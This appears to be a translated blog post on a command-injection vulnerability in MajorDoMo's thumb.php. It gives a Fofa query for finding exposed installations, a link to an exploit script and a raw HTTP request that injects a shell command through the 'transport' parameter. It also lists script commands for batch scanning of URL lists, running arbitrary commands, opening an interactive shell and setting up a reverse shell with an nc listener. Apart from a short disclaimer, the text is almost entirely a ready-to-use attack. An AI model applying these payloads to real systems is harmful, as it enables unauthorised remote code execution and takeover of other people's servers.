Disclaimer: Please do not use the techniques mentioned in this article for illegal testing. Any direct or indirect consequences and losses caused by the dissemination or use of the information or tools provided in this article are the sole responsibility of the user. The author of this article is not responsible for any adverse consequences. This article is for educational purposes only.Fofa:
title="MajordomoSL"
EXP (Exploit Script) Download Link:
https://github.com/jisi-001/MajorDoMo-thumb.git
POC
GET /modules/thumb/thumb.php?url=cnRzcDocm1EMe3&debug=1&transport=%7C%7C+id%3B HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Upgrade-Insecure-Requests: 1
Vulnerability Reproduction:Verify the existence of the vulnerability based on the POC:
Vulnerability Exploitation:Use the author’s own EXP to detect the vulnerability:Single Detection:python .\MajorDoMoRceExp.py -u URL
Batch Detection:python .\MajorDoMoRceExp.py -r urls.txt
Execute Command:python .\MajorDoMoRceExp.py -u URL -c whoami
Obtain Command Execution Environment (shell):python .\MajorDoMoRceExp.py -u URL -s I
Reverse Shell:python .\MajorDoMoRceExp.py -u URL -s R First, start listening on the server: nc -lvvp 4444
Then execute the EXP script, input the server’s IP and listening PORT
Successfully reverse shell
Script Parameters:
options: -h, --help show this help message and exit -u URL, --url URL Please enter the URL to be tested -f FILE, --file FILE Please enter the file address with one URL per line -c ..., --exec ... Please enter the command, note: please detect the existence of the vulnerability before executing the command! -s SHELL, --shell SHELL Input I to get shell, input R to reverse shell